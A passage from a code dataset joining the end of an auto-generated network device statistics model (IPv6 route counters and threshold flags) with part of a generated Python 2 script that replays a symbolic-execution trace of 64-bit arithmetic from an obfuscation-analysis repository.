prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("v6McThr", prop)
prop = PropMeta("str", "v6McTr", "v6McTr", 44119, PropCategory.IMPLICIT_TREND)
prop.label = "Total v6 128 MC Routes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McTr", prop)
prop = PropMeta("str", "v6McTrBase", "v6McTrBase", 44118, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Total v6 128 MC Routes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6McTrBase", prop)
prop = PropMeta("str", "v6TotalAvg", "v6TotalAvg", 44136, PropCategory.IMPLICIT_AVG)
prop.label = "Total v6 128 Routes average value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalAvg", prop)
prop = PropMeta("str", "v6TotalBase", "v6TotalBase", 44131, PropCategory.IMPLICIT_BASELINE)
prop.label = "Total v6 128 Routes baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalBase", prop)
prop = PropMeta("str", "v6TotalCum", "v6TotalCum", 44132, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Total v6 128 Routes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalCum", prop)
prop = PropMeta("str", "v6TotalLast", "v6TotalLast", 44130, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Total v6 128 Routes current value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalLast", prop)
prop = PropMeta("str", "v6TotalMax", "v6TotalMax", 44135, PropCategory.IMPLICIT_MAX)
prop.label = "Total v6 128 Routes maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalMax", prop)
prop = PropMeta("str", "v6TotalMin", "v6TotalMin", 44134, PropCategory.IMPLICIT_MIN)
prop.label = "Total v6 128 Routes minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalMin", prop)
prop = PropMeta("str", "v6TotalPer", "v6TotalPer", 44133, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Total v6 128 Routes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalPer", prop)
prop = PropMeta("str", "v6TotalRate", "v6TotalRate", 44141, PropCategory.IMPLICIT_RATE)
prop.label = "Total v6 128 Routes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalRate", prop)
prop = PropMeta("str", "v6TotalSpct", "v6TotalSpct", 44137, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Total v6 128 Routes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalSpct", prop)
prop = PropMeta("str", "v6TotalThr", "v6TotalThr", 44138, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Total v6 128 Routes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("v6TotalThr", prop)
prop = PropMeta("str", "v6TotalTr", "v6TotalTr", 44140, PropCategory.IMPLICIT_TREND)
prop.label = "Total v6 128 Routes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalTr", prop)
prop = PropMeta("str", "v6TotalTrBase", "v6TotalTrBase", 44139, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Total v6 128 Routes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6TotalTrBase", prop)
prop = PropMeta("str", "v6UcAvg", "v6UcAvg", 44157, PropCategory.IMPLICIT_AVG)
prop.label = "Total v6 128 UC Routes average value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcAvg", prop)
prop = PropMeta("str", "v6UcBase", "v6UcBase", 44152, PropCategory.IMPLICIT_BASELINE)
prop.label = "Total v6 128 UC Routes baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcBase", prop)
prop = PropMeta("str", "v6UcCum", "v6UcCum", 44153, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Total v6 128 UC Routes cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcCum", prop)
prop = PropMeta("str", "v6UcLast", "v6UcLast", 44151, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Total v6 128 UC Routes current value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcLast", prop)
prop = PropMeta("str", "v6UcMax", "v6UcMax", 44156, PropCategory.IMPLICIT_MAX)
prop.label = "Total v6 128 UC Routes maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcMax", prop)
prop = PropMeta("str", "v6UcMin", "v6UcMin", 44155, PropCategory.IMPLICIT_MIN)
prop.label = "Total v6 128 UC Routes minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcMin", prop)
prop = PropMeta("str", "v6UcPer", "v6UcPer", 44154, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Total v6 128 UC Routes periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcPer", prop)
prop = PropMeta("str", "v6UcRate", "v6UcRate", 44162, PropCategory.IMPLICIT_RATE)
prop.label = "Total v6 128 UC Routes rate"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcRate", prop)
prop = PropMeta("str", "v6UcSpct", "v6UcSpct", 44158, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Total v6 128 UC Routes suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcSpct", prop)
prop = PropMeta("str", "v6UcThr", "v6UcThr", 44159, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Total v6 128 UC Routes thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("v6UcThr", prop)
prop = PropMeta("str", "v6UcTr", "v6UcTr", 44161, PropCategory.IMPLICIT_TREND)
prop.label = "Total v6 128 UC Routes trend"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcTr", prop)
prop = PropMeta("str", "v6UcTrBase", "v6UcTrBase", 44160, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Total v6 128 UC Routes trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("v6UcTrBase", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
    """Create this MO under *parentMoOrDn*; the class has no naming
    properties, so no naming values are forwarded to Mo.__init__."""
    Mo.__init__(self, parentMoOrDn, markDirty, **creationProps)
# End of package file
# ##################################################
| [
"bkhoward@live.com"
] | bkhoward@live.com |
077ef840808c900b6c84ca30e5df3ad172cb241c | d78989a8ce52a98f48d77228c4ea893f7aae31f7 | /symbolic_expressions/sample26-virt-max-merge-lenght-10.py | 80de3bb4575b535cfa9b82ef617dff0381d1648f | [] | no_license | llyuer/Tigress_protection | 78ead2cf9979a7b3287175cd812833167d520244 | 77c68c4c949340158b855561726071cfdd82545f | refs/heads/master | 2020-06-17T11:16:40.078433 | 2019-04-16T09:27:29 | 2019-04-16T09:27:29 | 195,908,093 | 1 | 0 | null | 2019-07-09T01:14:06 | 2019-07-09T01:14:06 | null | UTF-8 | Python | false | false | 14,613 | py | #!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys
def sx(bits, value):
    """Sign-extend *value*, interpreted as a *bits*-wide two's-complement int."""
    msb = 1 << (bits - 1)
    magnitude = value & (msb - 1)
    sign_part = value & msb
    return magnitude - sign_part
# Auto-generated symbolic-expression replay (Triton-style trace), Python 2.
# Reads one integer from argv[1] (the symbolic input SymVar_0), replays a
# recorded chain of 64-bit machine operations (MOV/SHR/AND/OR/ADD/SUB/SHL),
# and prints the final 64-bit result.  Each ref_N mirrors one recorded
# expression; most are plain MOV aliases of an earlier ref, so the order of
# these assignments must not be disturbed.
SymVar_0 = int(sys.argv[1])
ref_263 = SymVar_0
ref_278 = ref_263 # MOV operation
ref_5500 = ref_278 # MOV operation
ref_5542 = ref_5500 # MOV operation
ref_5550 = (ref_5542 >> (0x5 & 0x3F)) # SHR operation
ref_5557 = ref_5550 # MOV operation
ref_5589 = ref_5557 # MOV operation
ref_5603 = (0x1376783EF7559EA & ref_5589) # AND operation
ref_5642 = ref_5603 # MOV operation
# Byte-wise decomposition of ref_5642 (byte 7 down to byte 0).
ref_5644 = ((ref_5642 >> 56) & 0xFF) # Byte reference - MOV operation
ref_5645 = ((ref_5642 >> 48) & 0xFF) # Byte reference - MOV operation
ref_5646 = ((ref_5642 >> 40) & 0xFF) # Byte reference - MOV operation
ref_5647 = ((ref_5642 >> 32) & 0xFF) # Byte reference - MOV operation
ref_5648 = ((ref_5642 >> 24) & 0xFF) # Byte reference - MOV operation
ref_5649 = ((ref_5642 >> 16) & 0xFF) # Byte reference - MOV operation
ref_5650 = ((ref_5642 >> 8) & 0xFF) # Byte reference - MOV operation
ref_5651 = (ref_5642 & 0xFF) # Byte reference - MOV operation
ref_6499 = ref_278 # MOV operation
ref_6541 = ref_6499 # MOV operation
ref_6547 = (0x1A5612E2 | ref_6541) # OR operation
ref_6904 = ref_5642 # MOV operation
ref_6936 = ref_6904 # MOV operation
ref_6950 = (0x7063FB7 & ref_6936) # AND operation
ref_6987 = ref_6547 # MOV operation
ref_6999 = ref_6950 # MOV operation
ref_7001 = ((ref_6999 + ref_6987) & 0xFFFFFFFFFFFFFFFF) # ADD operation
ref_7041 = ref_7001 # MOV operation
# Byte-wise decomposition of ref_7041 (byte 7 down to byte 0).
ref_7043 = ((ref_7041 >> 56) & 0xFF) # Byte reference - MOV operation
ref_7044 = ((ref_7041 >> 48) & 0xFF) # Byte reference - MOV operation
ref_7045 = ((ref_7041 >> 40) & 0xFF) # Byte reference - MOV operation
ref_7046 = ((ref_7041 >> 32) & 0xFF) # Byte reference - MOV operation
ref_7047 = ((ref_7041 >> 24) & 0xFF) # Byte reference - MOV operation
ref_7048 = ((ref_7041 >> 16) & 0xFF) # Byte reference - MOV operation
ref_7049 = ((ref_7041 >> 8) & 0xFF) # Byte reference - MOV operation
ref_7050 = (ref_7041 & 0xFF) # Byte reference - MOV operation
ref_7809 = ref_7041 # MOV operation
ref_7859 = ref_7809 # MOV operation
ref_7873 = (ref_7859 >> (0x3 & 0x3F)) # SHR operation
ref_8002 = ref_7873 # MOV operation
ref_8016 = (0xF & ref_8002) # AND operation
ref_8063 = ref_8016 # MOV operation
ref_8069 = (0x1 | ref_8063) # OR operation
ref_8120 = ref_8069 # MOV operation
ref_8122 = ((0x3162E74F << ((ref_8120 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_8541 = ref_7041 # MOV operation
ref_8591 = ref_8541 # MOV operation
ref_8605 = (ref_8591 >> (0x3 & 0x3F)) # SHR operation
ref_8734 = ref_8605 # MOV operation
ref_8748 = (0xF & ref_8734) # AND operation
ref_8795 = ref_8748 # MOV operation
ref_8801 = (0x1 | ref_8795) # OR operation
ref_8852 = ref_8801 # MOV operation
ref_8854 = ((0x40 - ref_8852) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_8862 = ref_8854 # MOV operation
ref_8906 = ref_8862 # MOV operation
ref_8908 = (0x3162E74F >> ((ref_8906 & 0xFF) & 0x3F)) # SHR operation
ref_8945 = ref_8122 # MOV operation
ref_8957 = ref_8908 # MOV operation
ref_8959 = (ref_8957 | ref_8945) # OR operation
ref_9014 = ref_8959 # MOV operation
ref_9028 = (ref_9014 >> (0x4 & 0x3F)) # SHR operation
ref_9157 = ref_9028 # MOV operation
ref_9171 = (0x7 & ref_9157) # AND operation
ref_9218 = ref_9171 # MOV operation
ref_9224 = (0x1 | ref_9218) # OR operation
ref_9674 = ref_278 # MOV operation
ref_9706 = ref_9674 # MOV operation
ref_9720 = ((ref_9706 - 0x2907943) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_9728 = ref_9720 # MOV operation
ref_9760 = ref_9728 # MOV operation
ref_9772 = ref_9224 # MOV operation
ref_9774 = ((ref_9760 << ((ref_9772 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_9813 = ref_9774 # MOV operation
ref_10668 = ref_278 # MOV operation
ref_10700 = ref_10668 # MOV operation
ref_10714 = ((ref_10700 - 0x3C563FC) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_10722 = ref_10714 # MOV operation
ref_10756 = ref_10722 # MOV operation
ref_11918 = ref_10756 # MOV operation
ref_12506 = ref_7041 # MOV operation
ref_12538 = ref_12506 # MOV operation
ref_12552 = (0xF & ref_12538) # AND operation
ref_12589 = ref_12552 # MOV operation
ref_12603 = ((ref_12589 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_12640 = ref_11918 # MOV operation
ref_12652 = ref_12603 # MOV operation
ref_12654 = (ref_12652 | ref_12640) # OR operation
ref_12693 = ref_12654 # MOV operation
ref_13425 = ref_9813 # MOV operation
ref_13841 = ref_12693 # MOV operation
ref_13865 = ref_13841 # MOV operation
ref_13871 = (0x1F & ref_13865) # AND operation
ref_13894 = ref_13871 # MOV operation
ref_13908 = ((ref_13894 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_14045 = ref_13425 # MOV operation
ref_14049 = ref_13908 # MOV operation
ref_14051 = (ref_14049 | ref_14045) # OR operation
ref_14090 = ref_14051 # MOV operation
ref_14716 = ref_12693 # MOV operation
ref_15304 = ref_7041 # MOV operation
ref_15336 = ref_15304 # MOV operation
ref_15350 = (0xF & ref_15336) # AND operation
ref_15387 = ref_15350 # MOV operation
ref_15401 = ((ref_15387 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_15438 = ref_14716 # MOV operation
ref_15450 = ref_15401 # MOV operation
ref_15452 = (ref_15450 | ref_15438) # OR operation
ref_15491 = ref_15452 # MOV operation
ref_16875 = ref_15491 # MOV operation
ref_17463 = ref_15491 # MOV operation
ref_17495 = ref_17463 # MOV operation
ref_17509 = (0xF & ref_17495) # AND operation
ref_17546 = ref_17509 # MOV operation
ref_17560 = ((ref_17546 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_17597 = ref_16875 # MOV operation
ref_17609 = ref_17560 # MOV operation
ref_17611 = (ref_17609 | ref_17597) # OR operation
ref_17650 = ref_17611 # MOV operation
ref_18382 = ref_14090 # MOV operation
ref_18798 = ref_17650 # MOV operation
ref_18822 = ref_18798 # MOV operation
ref_18828 = (0x1F & ref_18822) # AND operation
ref_18851 = ref_18828 # MOV operation
ref_18865 = ((ref_18851 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_19002 = ref_18382 # MOV operation
ref_19006 = ref_18865 # MOV operation
ref_19008 = (ref_19006 | ref_19002) # OR operation
ref_19047 = ref_19008 # MOV operation
# Byte-wise decomposition of ref_19047 (byte 7 down to byte 0).
ref_19049 = ((ref_19047 >> 56) & 0xFF) # Byte reference - MOV operation
ref_19050 = ((ref_19047 >> 48) & 0xFF) # Byte reference - MOV operation
ref_19051 = ((ref_19047 >> 40) & 0xFF) # Byte reference - MOV operation
ref_19052 = ((ref_19047 >> 32) & 0xFF) # Byte reference - MOV operation
ref_19053 = ((ref_19047 >> 24) & 0xFF) # Byte reference - MOV operation
ref_19054 = ((ref_19047 >> 16) & 0xFF) # Byte reference - MOV operation
ref_19055 = ((ref_19047 >> 8) & 0xFF) # Byte reference - MOV operation
ref_19056 = (ref_19047 & 0xFF) # Byte reference - MOV operation
ref_19673 = ref_17650 # MOV operation
ref_20261 = ref_17650 # MOV operation
ref_20293 = ref_20261 # MOV operation
ref_20307 = (0xF & ref_20293) # AND operation
ref_20344 = ref_20307 # MOV operation
ref_20358 = ((ref_20344 << (0x3 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_20395 = ref_19673 # MOV operation
ref_20407 = ref_20358 # MOV operation
ref_20409 = (ref_20407 | ref_20395) # OR operation
ref_20448 = ref_20409 # MOV operation
ref_23966 = ref_20448 # MOV operation
ref_24382 = ref_19047 # MOV operation
ref_24762 = ref_19047 # MOV operation
ref_24778 = ref_24382 # MOV operation
ref_24790 = ref_24762 # MOV operation
ref_24792 = ((ref_24790 + ref_24778) & 0xFFFFFFFFFFFFFFFF) # ADD operation
ref_24816 = ref_24792 # MOV operation
ref_24830 = (0x7 & ref_24816) # AND operation
ref_24959 = ref_24830 # MOV operation
ref_24973 = ((ref_24959 << (0x2 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_25010 = ref_23966 # MOV operation
ref_25022 = ref_24973 # MOV operation
ref_25024 = (ref_25022 | ref_25010) # OR operation
ref_25063 = ref_25024 # MOV operation
# Reassemble dwords from the byte slices extracted above (big-endian order).
ref_25587 = ((((ref_19049) << 8 | ref_19050) << 8 | ref_19051) << 8 | ref_19052) # MOV operation
ref_25653 = (ref_25587 & 0xFFFFFFFF) # MOV operation
ref_26279 = ((((ref_19053) << 8 | ref_19054) << 8 | ref_19055) << 8 | ref_19056) # MOV operation
ref_26893 = (ref_26279 & 0xFFFFFFFF) # MOV operation
ref_26895 = (((ref_26893 & 0xFFFFFFFF) >> 24) & 0xFF) # Byte reference - MOV operation
ref_26896 = (((ref_26893 & 0xFFFFFFFF) >> 16) & 0xFF) # Byte reference - MOV operation
ref_26897 = (((ref_26893 & 0xFFFFFFFF) >> 8) & 0xFF) # Byte reference - MOV operation
ref_26898 = ((ref_26893 & 0xFFFFFFFF) & 0xFF) # Byte reference - MOV operation
ref_26961 = (ref_25653 & 0xFFFFFFFF) # MOV operation
ref_27595 = (ref_26961 & 0xFFFFFFFF) # MOV operation
ref_27597 = (((ref_27595 & 0xFFFFFFFF) >> 24) & 0xFF) # Byte reference - MOV operation
ref_27598 = (((ref_27595 & 0xFFFFFFFF) >> 16) & 0xFF) # Byte reference - MOV operation
ref_27599 = (((ref_27595 & 0xFFFFFFFF) >> 8) & 0xFF) # Byte reference - MOV operation
ref_27600 = ((ref_27595 & 0xFFFFFFFF) & 0xFF) # Byte reference - MOV operation
ref_28265 = ref_5646 # MOVZX operation
ref_28283 = (ref_28265 & 0xFF) # MOVZX operation
ref_29497 = ref_5647 # MOVZX operation
ref_29515 = (ref_29497 & 0xFF) # MOVZX operation
ref_29517 = (ref_29515 & 0xFF) # Byte reference - MOV operation
ref_30191 = (ref_28283 & 0xFF) # MOVZX operation
ref_30209 = (ref_30191 & 0xFF) # MOVZX operation
ref_30211 = (ref_30209 & 0xFF) # Byte reference - MOV operation
ref_30847 = ref_5645 # MOVZX operation
ref_30865 = (ref_30847 & 0xFF) # MOVZX operation
ref_32079 = ref_5651 # MOVZX operation
ref_32097 = (ref_32079 & 0xFF) # MOVZX operation
ref_32099 = (ref_32097 & 0xFF) # Byte reference - MOV operation
ref_32773 = (ref_30865 & 0xFF) # MOVZX operation
ref_32791 = (ref_32773 & 0xFF) # MOVZX operation
ref_32793 = (ref_32791 & 0xFF) # Byte reference - MOV operation
ref_33413 = ((((ref_7047) << 8 | ref_7048) << 8 | ref_7049) << 8 | ref_7050) # MOV operation
ref_33479 = (ref_33413 & 0xFFFFFFFF) # MOV operation
ref_34105 = ((((ref_7043) << 8 | ref_7044) << 8 | ref_7045) << 8 | ref_7046) # MOV operation
ref_34719 = (ref_34105 & 0xFFFFFFFF) # MOV operation
ref_34721 = (((ref_34719 & 0xFFFFFFFF) >> 24) & 0xFF) # Byte reference - MOV operation
ref_34722 = (((ref_34719 & 0xFFFFFFFF) >> 16) & 0xFF) # Byte reference - MOV operation
ref_34723 = (((ref_34719 & 0xFFFFFFFF) >> 8) & 0xFF) # Byte reference - MOV operation
ref_34724 = ((ref_34719 & 0xFFFFFFFF) & 0xFF) # Byte reference - MOV operation
ref_34787 = (ref_33479 & 0xFFFFFFFF) # MOV operation
ref_35421 = (ref_34787 & 0xFFFFFFFF) # MOV operation
ref_35423 = (((ref_35421 & 0xFFFFFFFF) >> 24) & 0xFF) # Byte reference - MOV operation
ref_35424 = (((ref_35421 & 0xFFFFFFFF) >> 16) & 0xFF) # Byte reference - MOV operation
ref_35425 = (((ref_35421 & 0xFFFFFFFF) >> 8) & 0xFF) # Byte reference - MOV operation
ref_35426 = ((ref_35421 & 0xFFFFFFFF) & 0xFF) # Byte reference - MOV operation
# Reassemble full 64-bit quantities from individual byte refs.
ref_36799 = ((((((((ref_35423) << 8 | ref_35424) << 8 | ref_35425) << 8 | ref_35426) << 8 | ref_34721) << 8 | ref_34722) << 8 | ref_34723) << 8 | ref_34724) # MOV operation
ref_37387 = ((((((((ref_5644) << 8 | ref_32099) << 8 | ref_29517) << 8 | ref_30211) << 8 | ref_5648) << 8 | ref_5649) << 8 | ref_5650) << 8 | ref_32793) # MOV operation
ref_37419 = ref_37387 # MOV operation
ref_37433 = (0x3F & ref_37419) # AND operation
ref_37470 = ref_37433 # MOV operation
ref_37484 = ((ref_37470 << (0x4 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_37521 = ref_36799 # MOV operation
ref_37533 = ref_37484 # MOV operation
ref_37535 = (ref_37533 | ref_37521) # OR operation
ref_37574 = ref_37535 # MOV operation
ref_39128 = ((((((((ref_26895) << 8 | ref_26896) << 8 | ref_26897) << 8 | ref_26898) << 8 | ref_27597) << 8 | ref_27598) << 8 | ref_27599) << 8 | ref_27600) # MOV operation
ref_39544 = ref_25063 # MOV operation
ref_39890 = ref_37574 # MOV operation
ref_39924 = ref_39890 # MOV operation
ref_39938 = (ref_39924 >> (0x3 & 0x3F)) # SHR operation
ref_40047 = ref_39938 # MOV operation
ref_40061 = (0xF & ref_40047) # AND operation
ref_40108 = ref_40061 # MOV operation
ref_40114 = (0x1 | ref_40108) # OR operation
ref_40151 = ref_39544 # MOV operation
ref_40163 = ref_40114 # MOV operation
ref_40165 = (ref_40151 >> ((ref_40163 & 0xFF) & 0x3F)) # SHR operation
ref_40494 = ref_37574 # MOV operation
ref_40528 = ref_40494 # MOV operation
ref_40542 = (ref_40528 >> (0x3 & 0x3F)) # SHR operation
ref_40651 = ref_40542 # MOV operation
ref_40665 = (0xF & ref_40651) # AND operation
